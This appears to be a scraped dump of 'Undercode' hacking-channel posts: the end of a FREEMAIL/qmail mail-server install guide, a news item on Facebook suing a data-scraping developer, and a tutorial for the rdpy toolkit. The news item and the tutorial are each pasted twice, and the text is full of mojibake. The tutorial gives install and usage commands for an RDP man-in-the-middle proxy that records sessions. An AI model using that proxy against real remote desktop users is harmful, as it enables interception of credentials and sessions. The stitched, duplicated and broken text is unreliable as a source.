The IP address of the server in the FREEMAIL system. For the stand-alone version, only this Machine IP, such as:
10.1.1.217 -------------This item is modified to the corresponding IP address
-rw-r--r-- 1 root wheel 65 Sep 5 17:28 system.conf----- ----- System control information
long _MAXUSERS=200000;
char _SINGLE=``''T''''; //Is it a stand-alone system?
int _MAXHOST=10;
char _ENCRYPT='T'; //Whether the user password encryption?
-rw-r--r-- 1 root wheel 0 Sep 6 15:10 system.disk--------- Disk information in the system (usually empty)
-rw-r--r-- 1 root wheel 67 Sep 6 14:41 tcp.smtp --------- tcpserver configuration information
127.0.0.1:allow,RELAYCLIENT= "" ""
10.1.1: the allow, RELAYCLIENT = "" ""
: the you allow
- rw-r--r-- 1 root wheel 20 Sep 6 10:47 webmail.conf ------APACHE path information
/usr/apache/htdocs/ ---------cannot be changed
<Explanation: APACHE is installed in the /usr/apache directory by default in the installation program we provide, so this setting cannot be modified, otherwise, the page cannot be browsed correctly>
5. Enter the /usr/install/FREEMAIL directory and install in sequence :
./Apache.install.sh-------The path is /usr/apache
<Note: After installing this item, the ServerName
and ServerAdmin of the /usr/apache/conf/httpd.conf file should be modified to The corresponding domain and the E-mail account of the administrator, we have set up other items>
./ldap.install.sh-------The path is /usr/ldap
./mysql.install.sh--- ----The path is /usr/local
./src.install.sh -------The path is /usr/apache/cgi-bin
./qmail.install.sh-------The path is /var/qmail
<Note: You will be prompted to enter the domain name when installing this item, please enter it correctly>
./imap.install.sh ------The path is /usr/lib/courier_imap
<Description: After the above items are installed You can use
telnet localhost 80 //Check if apache has run
telnet localhost 143 //If imap has been installed correctly>
6. Modify the domain name settings in several pages under APACHE:
default.htm regtable.htm manager_default.htm forgetpassword.htm
<modify sss.soim.com/test.soim.com in the above pages to your settings Domain name>
8. After the system runs, add in /etc/rc.local:
/usr/apache/bin/httpd βf /usr/apache/conf/httpd.conf & //Start apache
/usr/local/ bin/safe_mysqld & //Start mysql
/var/qmail/rc & //Start qmail
/usr/local/bin/tcpserver -x /etc/tcp.smtp.cdb -R -c 100 -u 0 0 smtp /var/ qmail/bin/qmail-smtpd &
/usr/local/bin/tcpserver -c 100 -u 65534 0 pop3 /var/qmail/bin/qmail-popup mail-vip.soim.com /bin/checkpassword /var/qmail/ bin/qmail-pop3d Maildir &
/usr/local/bin/slapd -f /usr/ldap/conf/slapd-master.conf -p 389 -d 5> /dev/null 2>&1 &
/usr/local/bin/imapd.rc start &
used to define system startup settings
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
/usr/local/bin/imapd.rc start &
used to define system startup settings
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Faceboook #news :
Facebook sues a developer for stealing data from 5,500 users
1οΈβ£According to foreign media reports, according to court documents, Facebook is suing a developer, saying that the developer participated in a data collection activity and stolen personal information from thousands of people. The company asked the defendant to provide $75,000 in compensation in the lawsuit. The social networking company said on Thursday that they are suing Mohammad Zaghar and its website Massroot8, alleging that the website obtained Facebook users' data without permission.
2οΈβ£The act was alleged to violate the Computer Fraud and Abuse Act. The lawsuit filed in Northern California states that Zagharβs website provides customers with the ability to obtain data from Facebook friends, including phone numbers, genders, birth dates, and email addresses.
3οΈβ£All of this data is published publicly by Facebook users, but the automation provided by the Zaghar website is said to enable people to access this information at a faster rate and on a larger scale. Facebook also accused Zaghar of using a botnet to bypass Facebook's detection by pretending to be an Android device using social networks. In response to this lawsuit, Zaghar did not respond to requests for comment.
4οΈβ£Facebook said that data collection activities continued from April 23 to May 6, and about 5,500 people signed up for the service. The indictment alleges that in addition to the data collected from these 5,500 customers' friends on Facebook, Massroot8 also asked its customers to provide login credentials.
5οΈβ£Facebook stated that they had issued Zaghar several orders to stop, and temporarily blocked his Facebook and Instagram accounts and asked his customers to change their passwords for security reasons.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Faceboook #news :
Facebook sues a developer for stealing data from 5,500 users
1οΈβ£According to foreign media reports, according to court documents, Facebook is suing a developer, saying that the developer participated in a data collection activity and stolen personal information from thousands of people. The company asked the defendant to provide $75,000 in compensation in the lawsuit. The social networking company said on Thursday that they are suing Mohammad Zaghar and its website Massroot8, alleging that the website obtained Facebook users' data without permission.
2οΈβ£The act was alleged to violate the Computer Fraud and Abuse Act. The lawsuit filed in Northern California states that Zagharβs website provides customers with the ability to obtain data from Facebook friends, including phone numbers, genders, birth dates, and email addresses.
3οΈβ£All of this data is published publicly by Facebook users, but the automation provided by the Zaghar website is said to enable people to access this information at a faster rate and on a larger scale. Facebook also accused Zaghar of using a botnet to bypass Facebook's detection by pretending to be an Android device using social networks. In response to this lawsuit, Zaghar did not respond to requests for comment.
4οΈβ£Facebook said that data collection activities continued from April 23 to May 6, and about 5,500 people signed up for the service. The indictment alleges that in addition to the data collected from these 5,500 customers' friends on Facebook, Massroot8 also asked its customers to provide login credentials.
5οΈβ£Facebook stated that they had issued Zaghar several orders to stop, and temporarily blocked his Facebook and Instagram accounts and asked his customers to change their passwords for security reasons.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How build your owN RDP ?
> Remote Desktop Protocol in twisted python
2020 updated libs
π¦Dependencies
Dependencies are only needed for pyqt4 binaries :
rdpy-rdpclient
rdpy-rdpscreenshot
rdpy-vncclient
rdpy-vncscreenshot
rdpy-rssplayer
π¦FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£$ git clone https://github.com/citronneur/rdpy.git rdpy
2οΈβ£$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
3οΈβ£$ python rdpy/setup.py install
Or use PIP:
4οΈβ£$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
5οΈβ£$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
6οΈβ£$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦RDPY comes with some very useful binaries. These binaries are linux and windows compatible.
1οΈβ£rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
2οΈβ£rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
3οΈβ£$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
4οΈβ£$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
5οΈβ£$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
6οΈβ£$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
7οΈβ£rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
8οΈβ£$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N
The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size.
9οΈβ£rdpy-rssplayer
rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries.
$ rdpy-rssplayer.py rss_file_path
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How build your owN RDP ?
> Remote Desktop Protocol in twisted python
2020 updated libs
π¦Dependencies
Dependencies are only needed for pyqt4 binaries :
rdpy-rdpclient
rdpy-rdpscreenshot
rdpy-vncclient
rdpy-vncscreenshot
rdpy-rssplayer
π¦FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£$ git clone https://github.com/citronneur/rdpy.git rdpy
2οΈβ£$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
3οΈβ£$ python rdpy/setup.py install
Or use PIP:
4οΈβ£$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
5οΈβ£$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
6οΈβ£$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦RDPY comes with some very useful binaries. These binaries are linux and windows compatible.
1οΈβ£rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
2οΈβ£rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
3οΈβ£$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
4οΈβ£$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
5οΈβ£$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
6οΈβ£$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
7οΈβ£rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
8οΈβ£$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N
The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size.
9οΈβ£rdpy-rssplayer
rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries.
$ rdpy-rssplayer.py rss_file_path
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - citronneur/rdpy: Remote Desktop Protocol in Twisted Python
Remote Desktop Protocol in Twisted Python. Contribute to citronneur/rdpy development by creating an account on GitHub.